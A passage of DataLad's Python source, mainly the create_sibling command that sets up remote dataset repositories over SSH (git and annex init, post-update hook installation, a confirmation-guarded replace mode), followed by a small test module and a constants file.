Skipping\")\n return\n elif existing == 'replace':\n remove = False\n if path_children:\n has_git = '.git' in path_children\n _msg_stats = _msg \\\n + \" It is %sa git repository and has %d files/dirs.\" % (\n \"\" if has_git else \"not \", len(path_children)\n )\n if ui.is_interactive:\n remove = ui.yesno(\n \"Do you really want to remove it?\",\n title=_msg_stats,\n default=False\n )\n else:\n raise RuntimeError(\n _msg_stats +\n \" Remove it manually first or rerun datalad in \"\n \"interactive shell to confirm this action.\")\n if not remove:\n raise RuntimeError(_msg)\n # Remote location might already contain a git repository or be\n # just a directory.\n lgr.info(_msg + \" Replacing\")\n # enable write permissions to allow removing dir\n shell(\"chmod -R +r+w {}\".format(sh_quote(remoteds_path)))\n # remove target at path\n shell(\"rm -rf {}\".format(sh_quote(remoteds_path)))\n # if we succeeded in removing it\n path_exists = False\n # Since it is gone now, git-annex also should forget about it\n remotes = ds_repo.get_remotes()\n if name in remotes:\n # so we had this remote already, we should announce it dead\n # XXX what if there was some kind of mismatch and this name\n # isn't matching the actual remote UUID? 
should have we\n # checked more carefully?\n lgr.info(\n \"Announcing existing remote %s dead to annex and removing\",\n name\n )\n if isinstance(ds_repo, AnnexRepo):\n ds_repo.set_remote_dead(name)\n ds_repo.remove_remote(name)\n elif existing == 'reconfigure':\n lgr.info(_msg + \" Will only reconfigure\")\n only_reconfigure = True\n else:\n raise ValueError(\n \"Do not know how to handle existing={}\".format(\n repr(existing)))\n if not path_exists:\n shell(\"{} {}\".format(mkdir_cmd, sh_quote(remoteds_path)))\n\n delayed_super = _DelayedSuper(ds)\n if inherit and delayed_super.super:\n if shared is None:\n # here we must analyze current_ds's super, not the super_ds\n # inherit from the setting on remote end\n shared = CreateSibling._get_ds_remote_shared_setting(\n delayed_super, name, shell)\n\n if not install_postupdate_hook:\n # Even though directive from above was False due to no UI explicitly\n # requested, we were asked to inherit the setup, so we might need\n # to install the hook, if super has it on remote\n install_postupdate_hook = CreateSibling._has_active_postupdate(\n delayed_super, name, shell)\n\n if group:\n # Either repository existed before or a new directory was created for it,\n # set its group to a desired one if was provided with the same chgrp\n shell(\"chgrp -R {} {}\".format(\n sh_quote(str(group)),\n sh_quote(remoteds_path)))\n # don't (re-)initialize dataset if existing == reconfigure\n if not only_reconfigure:\n # init git and possibly annex repo\n if not CreateSibling.init_remote_repo(\n remoteds_path, shell, shared, ds,\n description=target_url):\n return\n\n if target_url and not is_ssh(target_url):\n # we are not coming in via SSH, hence cannot assume proper\n # setup for webserver access -> fix\n shell('git -C {} update-server-info'.format(sh_quote(remoteds_path)))\n else:\n # TODO -- we might still want to reconfigure 'shared' setting!\n pass\n\n # at this point we have a remote sibling in some shape or form\n # -> add as remote\n lgr.debug(\"Adding the siblings\")\n # TODO generator, yield the now swallowed results\n Siblings.__call__(\n 'configure',\n dataset=ds,\n name=name,\n url=ds_target_url,\n pushurl=ds_target_pushurl,\n recursive=False,\n fetch=True,\n as_common_datasrc=as_common_datasrc,\n publish_by_default=publish_by_default,\n publish_depends=publish_depends,\n annex_wanted=annex_wanted,\n annex_group=annex_group,\n annex_groupwanted=annex_groupwanted,\n inherit=inherit,\n result_renderer='disabled',\n )\n\n # check git version on remote end\n lgr.info(\"Adjusting remote git configuration\")\n if shell.get_git_version() and shell.get_git_version() >= LooseVersion(\"2.4\"):\n # allow for pushing to checked out branch\n try:\n shell(\"git -C {} config receive.denyCurrentBranch updateInstead\".format(\n sh_quote(remoteds_path)))\n except CommandError as e:\n ce = CapturedException(e)\n lgr.error(\"git config failed at remote location %s.\\n\"\n \"You will not be able to push to checked out \"\n \"branch. Error: %s\", remoteds_path, ce)\n else:\n lgr.error(\"Git version >= 2.4 needed to configure remote.\"\n \" Version detected on server: %s\\nSkipping configuration\"\n \" of receive.denyCurrentBranch - you will not be able to\"\n \" publish updates to this repository. 
Upgrade your git\"\n \" and run with --existing=reconfigure\",\n shell.get_git_version())\n\n branch = ds_repo.get_active_branch()\n if branch is not None:\n branch = ds_repo.get_corresponding_branch(branch) or branch\n # Setting the HEAD for the created sibling to the original repo's\n # current branch should be unsurprising, and it helps with consumers\n # that don't properly handle the default branch with no commits. See\n # gh-4349.\n shell(\"git -C {} symbolic-ref HEAD refs/heads/{}\"\n .format(sh_quote(remoteds_path), branch))\n\n if install_postupdate_hook:\n # enable metadata refresh on dataset updates to publication server\n lgr.info(\"Enabling git post-update hook ...\")\n try:\n CreateSibling.create_postupdate_hook(\n remoteds_path, shell, ds)\n except CommandError as e:\n ce = CapturedException(e)\n lgr.error(\"Failed to add json creation command to post update \"\n \"hook.\\nError: %s\", ce)\n\n return remoteds_path\n\n\ndef _ls_remote_path(ssh, path):\n try:\n # yoh tried ls on mac\n # escape path explicitly with shlex.quote as 'sh' is a POSIX shell and\n # sh_quote could decide to quote Windows-style\n # C.UTF-8 locale as opposed to C locale handles special characters (umlauts etc.)\n # ls falls back to C locale if LC_ALL is set to unknown locale, so this should be safe.\n ls_cmd = \"LC_ALL=C.UTF-8; export LC_ALL; /bin/ls -A1 {}\".format(shlex.quote(path))\n # TODO: Using sh_quote here is also flawed as it checks whether the\n # *local* machine is Windows. Doesn't help if the remote we're ssh'ing in is Windows.\n ssh_cmd = \"sh -c {}\".format(sh_quote(ls_cmd))\n out, err = ssh(ssh_cmd)\n\n if err:\n # we might even want to raise an exception, but since it was\n # not raised, let's just log a warning\n lgr.warning(\n \"There was some output to stderr while running ls on %s via ssh: %s\",\n path, err\n )\n except CommandError as e:\n if \"No such file or directory\" in e.stderr and \\\n path in e.stderr:\n return None\n else:\n raise # It's an unexpected failure here\n return [l for l in out.split(os.linesep) if l]\n\n\n@build_doc\nclass CreateSibling(Interface):\n \"\"\"Create a dataset sibling on a UNIX-like Shell (local or SSH)-accessible machine\n\n Given a local dataset, and a path or SSH login information this command\n creates a remote dataset repository and configures it as a dataset sibling\n to be used as a publication target (see `publish` command).\n\n Various properties of the remote sibling can be configured (e.g. name\n location on the server, read and write access URLs, and access\n permissions.\n\n Optionally, a basic web-viewer for DataLad datasets can be installed\n at the remote location.\n\n This command supports recursive processing of dataset hierarchies, creating\n a remote sibling for each dataset in the hierarchy. By default, remote\n siblings are created in hierarchical structure that reflects the\n organization on the local file system. However, a simple templating\n mechanism is provided to produce a flat list of datasets (see\n --target-dir).\n \"\"\"\n\n _params_ = dict(\n # TODO: Figure out, whether (and when) to use `sshurl` as push url\n dataset=Parameter(\n args=(\"--dataset\", \"-d\",),\n doc=\"\"\"specify the dataset to create the publication target for. If\n no dataset is given, an attempt is made to identify the dataset\n based on the current working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n sshurl=Parameter(\n args=(\"sshurl\",),\n metavar='SSHURL',\n nargs='?',\n doc=\"\"\"Login information for the target server. 
This can be given\n as a URL (ssh://host/path), SSH-style (user@host:path) or just\n a local path.\n Unless overridden, this also serves the future dataset's access\n URL and path on the server.\"\"\",\n constraints=EnsureStr()),\n name=Parameter(\n args=('-s', '--name',),\n metavar='NAME',\n doc=\"\"\"sibling name to create for this publication target.\n If `recursive` is set, the same name will be used to label all\n the subdatasets' siblings. When creating a target dataset fails,\n no sibling is added\"\"\",\n constraints=EnsureStr() | EnsureNone(),\n nargs=\"?\"),\n target_dir=Parameter(\n args=('--target-dir',),\n metavar='PATH',\n doc=\"\"\"path to the directory *on the server* where the dataset\n shall be created. By default this is set to the URL (or local\n path) specified via [PY: `sshurl` PY][CMD: SSHURL CMD]. If a\n relative path is provided here, it is interpreted as being\n relative to the user's home directory on the server (or\n relative to [PY: `sshurl` PY][CMD: SSHURL CMD], when that is a\n local path).\n Additional features are relevant for recursive processing of\n datasets with subdatasets. By default, the local\n dataset structure is replicated on the server. However, it is\n possible to provide a template for generating different target\n directory names for all (sub)datasets. Templates can contain\n certain placeholder that are substituted for each (sub)dataset.\n For example: \"/mydirectory/dataset%%RELNAME\".\\nSupported\n placeholders:\\n\n %%RELNAME - the name of the datasets, with any slashes replaced by\n dashes\\n\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n target_url=Parameter(\n args=('--target-url',),\n metavar='URL',\n doc=\"\"\"\"public\" access URL of the to-be-created target dataset(s)\n (default: `sshurl`). Accessibility of this URL determines the\n access permissions of potential consumers of the dataset.\n As with `target_dir`, templates (same set of placeholders)\n are supported. Also, if specified, it is provided as the annex\n description\\n\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n target_pushurl=Parameter(\n args=('--target-pushurl',),\n metavar='URL',\n doc=\"\"\"In case the `target_url` cannot be used to publish to the\n dataset, this option specifies an alternative URL for this\n purpose. As with `target_url`, templates (same set of\n placeholders) are supported.\\n\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n existing=Parameter(\n args=(\"--existing\",),\n constraints=EnsureChoice('skip', 'error', 'reconfigure', 'replace'),\n metavar='MODE',\n doc=\"\"\"action to perform, if a sibling is already configured under the\n given name and/or a target (non-empty) directory already exists.\n In this case, a dataset can be skipped ('skip'), the sibling\n configuration be updated ('reconfigure'), or process interrupts with\n error ('error'). DANGER ZONE: If 'replace' is used, an existing target\n directory will be forcefully removed, re-initialized, and the\n sibling (re-)configured (thus implies 'reconfigure').\n `replace` could lead to data loss, so use with care. 
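# A hedged, end-to-end usage sketch for the command whose parameters are
# documented above. The server URL, paths, and sibling name are made up;
# it assumes an existing dataset at the given path and SSH access to the
# server.
import datalad.api as dl

ds = dl.Dataset('/home/me/myds')
ds.create_sibling(
    'ssh://server.example.org/home/me/myds',   # sshurl
    name='server',
    existing='skip',    # leave an already-configured sibling/target alone
)
# once the sibling exists, regular publishing works against it
ds.push(to='server')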
To minimize\n possibility of data loss, in interactive mode DataLad will ask for\n confirmation, but it would raise an exception in non-interactive mode.\n \"\"\",),\n inherit=inherit_opt,\n shared=Parameter(\n args=(\"--shared\",),\n metavar='{false|true|umask|group|all|world|everybody|0xxx}',\n doc=\"\"\"if given, configures the access permissions on the server\n for multi-users (this could include access by a webserver!).\n Possible values for this option are identical to those of\n `git init --shared` and are described in its documentation.\"\"\",\n constraints=EnsureStr() | EnsureBool() | EnsureNone()),\n group=Parameter(\n args=(\"--group\",),\n metavar=\"GROUP\",\n doc=\"\"\"Filesystem group for the repository. Specifying the group is\n particularly important when [CMD: --shared=group CMD][PY:\n shared=\"group\" PY]\"\"\",\n constraints=EnsureStr() | EnsureNone()\n ),\n ui=Parameter(\n args=(\"--ui\",),\n metavar='{false|true|html_filename}',\n doc=\"\"\"publish a web interface for the dataset with an\n optional user-specified name for the html at publication\n target. defaults to `index.html` at dataset root\"\"\",\n constraints=EnsureBool() | EnsureStr()),\n as_common_datasrc=as_common_datasrc,\n publish_depends=publish_depends,\n publish_by_default=publish_by_default,\n annex_wanted=annex_wanted_opt,\n annex_group=annex_group_opt,\n annex_groupwanted=annex_groupwanted_opt,\n since=Parameter(\n args=(\"--since\",),\n constraints=EnsureStr() | EnsureNone(),\n doc=\"\"\"limit processing to subdatasets that have been changed since\n a given state (by tag, branch, commit, etc). This can be used to\n create siblings for recently added subdatasets.\n If '^' is given, the last state of the current branch at the sibling\n is taken as a starting point.\"\"\"),\n )\n\n @staticmethod\n @datasetmethod(name='create_sibling')\n @eval_results\n def __call__(sshurl,\n *,\n name=None, target_dir=None,\n target_url=None, target_pushurl=None,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n existing='error',\n shared=None,\n group=None,\n ui=False,\n as_common_datasrc=None,\n publish_by_default=None,\n publish_depends=None,\n annex_wanted=None, annex_group=None, annex_groupwanted=None,\n inherit=False,\n since=None):\n if ui:\n # the webui has been moved to the deprecated extension\n try:\n from datalad_deprecated.sibling_webui import (\n upload_web_interface,\n )\n except Exception as e:\n # we could just test for ModuleNotFoundError (which should be\n # all that would happen with PY3.6+, but be a little more robust\n # and use the pattern from duecredit\n if type(e).__name__ not in ('ImportError', 'ModuleNotFoundError'):\n lgr.error(\"Failed to import datalad_deprecated.sibling_webui \"\n \"due to %s\", str(e))\n raise RuntimeError(\n \"The DataLad web UI has been moved to an extension \"\n \"package. Please install the Python package \"\n \"`datalad_deprecated` to be able to deploy it.\"\n )\n\n # push uses '^' to annotate the previous pushed committish, and None for default\n # behavior. 
'' was/is (to be deprecated) used in `publish` and 'create-sibling'.\n # Alert user about the mistake\n if since == '':\n # deprecation was added prior 0.16.0\n import warnings\n warnings.warn(\"'since' should point to commitish or use '^'.\",\n DeprecationWarning)\n since = '^'\n\n #\n # nothing without a base dataset\n #\n ds = require_dataset(dataset, check_installed=True,\n purpose='create sibling(s)')\n refds_path = ds.path\n\n #\n # all checks that are possible before we start parsing the dataset\n #\n if since and not recursive:\n raise ValueError(\"The use of 'since' requires 'recursive'\")\n # possibly use sshurl to get the name in case if not specified\n if not sshurl:\n if not inherit:\n raise InsufficientArgumentsError(\n \"needs at least an SSH URL, if no inherit option\"\n )\n if name is None:\n raise ValueError(\n \"Neither SSH URL, nor the name of sibling to inherit from \"\n \"was specified\"\n )\n # It might well be that we already have this remote setup\n try:\n sshurl = CreateSibling._get_remote_url(ds, name)\n except Exception as exc:\n ce = CapturedException(exc)\n lgr.debug('%s does not know about url for %s: %s', ds, name, ce)\n elif inherit:\n raise ValueError(\n \"For now, for clarity not allowing specifying a custom sshurl \"\n \"while inheriting settings\"\n )\n # may be could be safely dropped -- still WiP\n\n if not sshurl:\n # TODO: may be more back up before _prep?\n super_ds = ds.get_superdataset()\n if not super_ds:\n raise ValueError(\n \"Could not determine super dataset for %s to inherit URL\"\n % ds\n )\n super_url = CreateSibling._get_remote_url(super_ds, name)\n # for now assuming hierarchical setup\n # (TODO: to be able to distinguish between the two, probably\n # needs storing datalad.*.target_dir to have %RELNAME in there)\n sshurl = slash_join(super_url, relpath(refds_path, super_ds.path))\n\n # check the login URL\n sibling_ri = RI(sshurl)\n ssh_sibling = is_ssh(sibling_ri)\n if not (ssh_sibling or isinstance(sibling_ri, PathRI)):\n raise ValueError(\n \"Unsupported SSH URL or path: '{0}', \"\n \"use ssh://host/path, host:path or path syntax\".format(sshurl))\n\n if not name:\n name = sibling_ri.hostname if ssh_sibling else \"local\"\n lgr.info(\n \"No sibling name given. 
Using %s'%s' as sibling name\",\n \"URL hostname \" if ssh_sibling else \"\",\n name)\n if since == '^':\n # consider creating siblings only since the point of\n # the last update\n # XXX here we assume one to one mapping of names from local branches\n # to the remote\n active_branch = ds.repo.get_active_branch()\n since = '%s/%s' % (name, active_branch)\n\n to_process = []\n if recursive:\n #\n # parse the base dataset to find all subdatasets that need processing\n #\n cand_ds = [\n Dataset(r['path'])\n for r in diff_dataset(\n ds,\n fr=since,\n to='HEAD',\n # w/o False we might not follow into new subdatasets\n # which do not have that remote yet setup,\n # see https://github.com/datalad/datalad/issues/6596\n constant_refs=False,\n # save cycles, we are only looking for datasets\n annex=None,\n untracked='no',\n recursive=True,\n datasets_only=True,\n )\n # not installed subdatasets would be 'clean' so we would skip them\n if r.get('type') == 'dataset' and r.get('state', None) != 'clean'\n ]\n if not since:\n # not only subdatasets\n cand_ds = [ds] + cand_ds\n else:\n # only the current ds\n cand_ds = [ds]\n # check remotes setup()\n for d in cand_ds:\n d_repo = d.repo\n if d_repo is None:\n continue\n checkds_remotes = d.repo.get_remotes()\n res = dict(\n action='create_sibling',\n path=d.path,\n type='dataset',\n )\n\n if publish_depends:\n # make sure dependencies are valid\n # TODO: inherit -- we might want to automagically create\n # those dependents as well???\n unknown_deps = set(ensure_list(publish_depends)).difference(\n checkds_remotes)\n if unknown_deps:\n yield dict(\n res,\n status='error',\n message=('unknown sibling(s) specified as publication '\n 'dependency: %s', unknown_deps),\n )\n continue\n if name in checkds_remotes and existing in ('error', 'skip'):\n yield dict(\n res,\n sibling_name=name,\n status='error' if existing == 'error' else 'notneeded',\n message=(\n \"sibling '%s' already configured (specify alternative \"\n \"name, or force reconfiguration via --existing\", name),\n )\n continue\n to_process.append(res)\n\n if not to_process:\n # we ruled out all possibilities\n # TODO wait for gh-1218 and make better return values\n lgr.info(\"No datasets qualify for sibling creation. 
\"\n \"Consider different settings for --existing \"\n \"or --since if this is unexpected\")\n return\n\n if ssh_sibling:\n # request ssh connection:\n lgr.info(\"Connecting ...\")\n shell = ssh_manager.get_connection(sshurl)\n else:\n shell = _RunnerAdapter()\n sibling_ri.path = str(resolve_path(sibling_ri.path, dataset))\n if target_dir:\n target_dir = opj(sibling_ri.path, target_dir)\n\n if target_dir is None:\n if sibling_ri.path:\n target_dir = sibling_ri.path\n else:\n target_dir = '.'\n\n # TODO: centralize and generalize template symbol handling\n replicate_local_structure = \"%RELNAME\" not in target_dir\n\n if not shell.get_annex_version():\n raise MissingExternalDependency(\n 'git-annex',\n msg=\"It's required on the {} machine to create a sibling\"\n .format('remote' if ssh_sibling else 'local'))\n\n #\n # all checks done and we have a connection, now do something\n #\n\n # loop over all datasets, ordered from top to bottom to make test\n # below valid (existing directories would cause the machinery to halt)\n # But we need to run post-update hook in depth-first fashion, so\n # would only collect first and then run (see gh #790)\n yielded = set()\n remote_repos_to_run_hook_for = []\n for currentds_ap in \\\n sorted(to_process, key=lambda x: x['path'].count('/')):\n current_ds = Dataset(currentds_ap['path'])\n\n path = _create_dataset_sibling(\n name,\n current_ds,\n refds_path,\n shell,\n replicate_local_structure,\n sibling_ri,\n target_dir,\n target_url,\n target_pushurl,\n existing,\n shared,\n group,\n publish_depends,\n publish_by_default,\n ui,\n as_common_datasrc,\n annex_wanted,\n annex_group,\n annex_groupwanted,\n inherit\n )\n currentds_ap[\"sibling_name\"] = name\n if not path:\n # nothing new was created\n # TODO is 'notneeded' appropriate in this case?\n currentds_ap['status'] = 'notneeded'\n # TODO explain status in 'message'\n yield currentds_ap\n yielded.add(currentds_ap['path'])\n continue\n remote_repos_to_run_hook_for.append((path, currentds_ap))\n\n # publish web-interface to root dataset on publication server\n if current_ds.path == refds_path and ui:\n from datalad_deprecated.sibling_webui import (\n upload_web_interface,\n )\n lgr.info(\"Uploading web interface to %s\", path)\n try:\n upload_web_interface(path, shell, shared, ui)\n except CommandError as e:\n ce = CapturedException(e)\n currentds_ap['status'] = 'error'\n currentds_ap['message'] = (\n \"failed to push web interface to the remote datalad repository (%s)\",\n ce)\n currentds_ap['exception'] = ce\n yield currentds_ap\n yielded.add(currentds_ap['path'])\n continue\n\n # in reverse order would be depth first\n lgr.info(\"Running post-update hooks in all created siblings\")\n # TODO: add progressbar\n for path, currentds_ap in remote_repos_to_run_hook_for[::-1]:\n # Trigger the hook\n lgr.debug(\"Running hook for %s (if exists and executable)\", path)\n try:\n shell(\"cd {} \"\n \"&& ( [ -x hooks/post-update ] && hooks/post-update || true )\"\n \"\".format(sh_quote(_path_(path, \".git\"))))\n except CommandError as e:\n ce = CapturedException(e)\n currentds_ap['status'] = 'error'\n currentds_ap['message'] = (\n \"failed to run post-update hook under remote path %s (%s)\",\n path, ce)\n currentds_ap['exception'] = ce\n yield currentds_ap\n yielded.add(currentds_ap['path'])\n continue\n if not currentds_ap['path'] in yielded:\n # if we were silent until now everything is just splendid\n currentds_ap['status'] = 'ok'\n yield currentds_ap\n\n @staticmethod\n def _run_on_ds_ssh_remote(ds, name, ssh, 
cmd):\n \"\"\"Given a dataset, and name of the remote, run command via ssh\n\n Parameters\n ----------\n cmd: str\n Will be .format()'ed given the `path` to the dataset on remote\n\n Returns\n -------\n out\n\n Raises\n ------\n CommandError\n \"\"\"\n remote_url = CreateSibling._get_remote_url(ds, name)\n remote_ri = RI(remote_url)\n out, err = ssh(cmd.format(path=sh_quote(remote_ri.path)))\n if err:\n lgr.warning(\"Got stderr while calling ssh: %s\", err)\n return out\n\n @staticmethod\n def _get_ds_remote_shared_setting(ds, name, ssh):\n \"\"\"Figure out setting of sharedrepository for dataset's `name` remote\"\"\"\n shared = None\n try:\n # TODO -- we might need to expanduser taking .user into account\n # but then it must be done also on remote side\n out = CreateSibling._run_on_ds_ssh_remote(\n ds, name, ssh,\n 'git -C {path} config --get core.sharedrepository'\n )\n shared = out.strip()\n except CommandError as e:\n ce = CapturedException(e)\n lgr.debug(\n \"Could not figure out remote shared setting of %s for %s due \"\n \"to %s\",\n ds, name, ce)\n # could well be ok if e.g. not shared\n # TODO: more detailed analysis may be?\n return shared\n\n @staticmethod\n def _has_active_postupdate(ds, name, ssh):\n \"\"\"Figure out either has active post-update hook\n\n Returns\n -------\n bool or None\n None if something went wrong and we could not figure out\n \"\"\"\n has_active_post_update = None\n try:\n # TODO -- we might need to expanduser taking .user into account\n # but then it must be done also on remote side\n out = CreateSibling._run_on_ds_ssh_remote(\n ds, name, ssh,\n 'cd {path} && [ -x .git/hooks/post-update ] && echo yes || echo no'\n )\n out = out.strip()\n assert out in ('yes', 'no')\n has_active_post_update = out == \"yes\"\n except CommandError as e:\n ce = CapturedException(e)\n lgr.debug(\n \"Could not figure out either %s on remote %s has active \"\n \"post_update hook due to %s\",\n ds, name, ce\n )\n return has_active_post_update\n\n @staticmethod\n def _get_remote_url(ds, name):\n \"\"\"A little helper to get url from pushurl or from url if not defined\"\"\"\n # take pushurl if present, if not -- just a url\n url = ds.config.get('remote.%s.pushurl' % name) or \\\n ds.config.get('remote.%s.url' % name)\n if not url:\n raise ValueError(\n \"%s had neither pushurl or url defined for %s\" % (ds, name)\n )\n return url\n\n @staticmethod\n def init_remote_repo(path, ssh, shared, dataset, description=None):\n cmd = \"git -C {} init{}\".format(\n sh_quote(path),\n \" --shared='{}'\".format(sh_quote(shared)) if shared else '')\n try:\n ssh(cmd)\n except CommandError as e:\n ce = CapturedException(e)\n lgr.error(\"Initialization of remote git repository failed at %s.\"\n \"\\nError: %s\\nSkipping ...\", path, ce)\n return False\n\n if isinstance(dataset.repo, AnnexRepo):\n # init remote git annex repo (part fix of #463)\n try:\n ssh(\n \"git -C {} annex init {}\".format(\n sh_quote(path),\n sh_quote(description)\n if description else '')\n )\n except CommandError as e:\n ce = CapturedException(e)\n lgr.error(\"Initialization of remote git annex repository failed at %s.\"\n \"\\nError: %s\\nSkipping ...\", path, ce)\n return False\n return True\n\n @staticmethod\n def create_postupdate_hook(path, ssh, dataset):\n # location of post-update hook file, logs folder on remote target\n hooks_remote_dir = opj(path, '.git', 'hooks')\n # make sure hooks directory exists (see #1251)\n ssh('{} {}'.format(mkdir_cmd, sh_quote(hooks_remote_dir)))\n hook_remote_target = 
opj(hooks_remote_dir, 'post-update')\n\n # create json command for current dataset\n log_filename = 'datalad-publish-hook-$(date +%s).log' % TIMESTAMP_FMT\n hook_content = r'''#!/bin/bash\n\ngit update-server-info\n\n#\n# DataLad\n#\n# (Re)generate meta-data for DataLad Web UI and possibly init new submodules\ndsdir=\"$(dirname $0)/../..\"\nlogfile=\"$dsdir/{WEB_META_LOG}/{log_filename}\"\n\nif [ ! -e \"$dsdir/.git\" ]; then\n echo Assumption of being under .git has failed >&2\n exit 1\nfi\n\nmkdir -p \"$dsdir/{WEB_META_LOG}\" # assure logs directory exists\n\n# Avoid file name collisions.\nsuffix=0\nlogfile_orig=\"$logfile\"\nwhile [ -f \"$logfile\" ]; do\n suffix=$(( $suffix + 1 ))\n logfile=\"$logfile_orig.$suffix\"\ndone\n\n( which datalad > /dev/null \\\n && ( cd \"$dsdir\"; GIT_DIR=\"$PWD/.git\" datalad ls -a --json file .; ) \\\n || echo \"E: no datalad found - skipping generation of indexes for web frontend\"; \\\n) &> \"$logfile\"\n'''.format(WEB_META_LOG=WEB_META_LOG, **locals())\n\n with make_tempfile(content=hook_content) as tempf:\n # create post_update hook script\n # upload hook to dataset\n ssh.put(tempf, hook_remote_target)\n # and make it executable\n ssh('chmod +x {}'.format(sh_quote(hook_remote_target)))\n" }, { "alpha_fraction": 0.5913705825805664, "alphanum_fraction": 0.6073241233825684, "avg_line_length": 29.9887638092041, "blob_id": "d2043158cec9fb775d49e5895f0dc854dfdb2fb5", "content_id": "01e849bc25f15eeb6b25b448ea1f08380e3cfe95", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2758, "license_type": "permissive", "max_line_length": 92, "num_lines": 89, "path": "/datalad/distribution/tests/test_create_test_dataset.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create testdataset helpers\n\n\"\"\"\n\nfrom glob import glob\nfrom os.path import join as opj\n\nfrom datalad.core.local.repo import repo_from_path\nfrom datalad.distribution.create_test_dataset import _parse_spec\nfrom datalad.tests.utils_pytest import (\n assert_raises,\n assert_repo_status,\n eq_,\n ok_,\n with_tempfile,\n)\nfrom datalad.utils import (\n chpwd,\n swallow_logs,\n swallow_outputs,\n)\n\n\n@with_tempfile(mkdir=True)\ndef test_create(outdir=None):\n from datalad.api import create\n assert_raises(ValueError, create, outdir, description='Precious data', annex=False)\n\n\ndef test_parse_spec():\n eq_(_parse_spec('0/3/-1'), [(0, 0), (3, 3), (0, 1)])\n eq_(_parse_spec('4-10'), [(4, 10)])\n eq_(_parse_spec(''), [])\n\n\ndef test_create_test_dataset():\n # rudimentary smoke test\n from datalad.api import create_test_dataset\n with swallow_logs(), swallow_outputs():\n dss = create_test_dataset(spec='2/1-2')\n ok_(5 <= len(dss) <= 7) # at least five - 1 top, two on top level, 1 in each\n for ds in dss:\n assert_repo_status(ds, annex=None) # some of them are annex but we just don't check\n ok_(len(glob(opj(ds, 'file*'))))\n\n\ndef test_create_1test_dataset():\n # and just a single dataset\n from datalad.api import create_test_dataset\n with swallow_outputs():\n dss = create_test_dataset()\n eq_(len(dss), 1)\n assert_repo_status(dss[0], annex=False)\n\n\n@with_tempfile(mkdir=True)\ndef 
test_new_relpath(topdir=None):\n from datalad.api import create_test_dataset\n with swallow_logs(), chpwd(topdir), swallow_outputs():\n dss = create_test_dataset('testds', spec='1')\n eq_(dss[0], opj(topdir, 'testds'))\n eq_(len(dss), 2) # 1 top + 1 sub-dataset as demanded\n for ds in dss:\n assert_repo_status(ds, annex=False)\n\n\n@with_tempfile()\ndef test_hierarchy(topdir=None):\n # GH 1178\n from datalad.api import create_test_dataset\n with swallow_logs(), swallow_outputs():\n dss = create_test_dataset(topdir, spec='1/1')\n\n eq_(len(dss), 3)\n eq_(dss[0], topdir)\n for ids, ds in enumerate(dss):\n assert_repo_status(ds, annex=False)\n # each one should have 2 commits (but the last one)-- one for file and\n # another one for sub-dataset\n repo = repo_from_path(ds)\n if not hasattr(repo, 'is_managed_branch') or not repo.is_managed_branch():\n eq_(len(list(repo.get_branch_commits_())), 1 + int(ids < 2))\n" }, { "alpha_fraction": 0.5907204747200012, "alphanum_fraction": 0.6386269330978394, "avg_line_length": 36.33802795410156, "blob_id": "0c115a397a63d486d9860ef13fc0ad058278a921", "content_id": "c662e0c7d7f3634e0b17a047ce729c969aa5b820", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2651, "license_type": "permissive", "max_line_length": 93, "num_lines": 71, "path": "/datalad/consts.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"constants for datalad\n\"\"\"\n\nimport os\nfrom os.path import join\nimport re\n\n# directory containing prepared metadata of a dataset repository:\nDATALAD_DOTDIR = \".datalad\"\n\nDATASET_CONFIG_FILE = join(DATALAD_DOTDIR, 'config')\n\nARCHIVES_SPECIAL_REMOTE = 'datalad-archives'\nDATALAD_SPECIAL_REMOTE = 'datalad'\nDATALAD_GIT_DIR = join('.git', 'datalad')\n\n# pregenerated using\n# python3 -c 'from datalad.customremotes.base import generate_uuids as guuid; print(guuid())'\nDATALAD_SPECIAL_REMOTES_UUIDS = {\n # should not be changed from now on!\n DATALAD_SPECIAL_REMOTE: 'cf13d535-b47c-5df6-8590-0793cb08a90a',\n ARCHIVES_SPECIAL_REMOTE: 'c04eb54b-4b4e-5755-8436-866b043170fa'\n}\nWEB_SPECIAL_REMOTE_UUID = '00000000-0000-0000-0000-000000000001'\n\nARCHIVES_TEMP_DIR = join(DATALAD_GIT_DIR, 'tmp', 'archives')\nANNEX_TEMP_DIR = join('.git', 'annex', 'tmp')\nANNEX_TRANSFER_DIR = join('.git', 'annex', 'transfer')\n\nSEARCH_INDEX_DOTGITDIR = join('datalad', 'search_index')\n\nDATASETS_TOPURL = os.environ.get(\"DATALAD_DATASETS_TOPURL\", None) \\\n or \"https://datasets.datalad.org/\"\n# safeguard\nif not DATASETS_TOPURL.endswith('/'):\n DATASETS_TOPURL += '/'\n\nWEB_META_LOG = join(DATALAD_GIT_DIR, 'logs')\n\n# Format to use for time stamps\nTIMESTAMP_FMT = \"%Y-%m-%dT%H:%M:%S%z\"\n\n# in order to avoid breakage, import runner-related const\nfrom datalad.runner.gitrunner import GIT_SSH_COMMAND\n\n# magic sha is from `git hash-object -t tree /dev/null`, i.e. 
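# A hedged usage sketch for the create_test_dataset helper exercised in the
# tests above: the spec string describes how many (sub)datasets to generate
# per level, e.g. '2/1' asks for two subdatasets under the top dataset, each
# containing one more. The output path is made up; assumes datalad is
# importable.
from datalad.api import create_test_dataset

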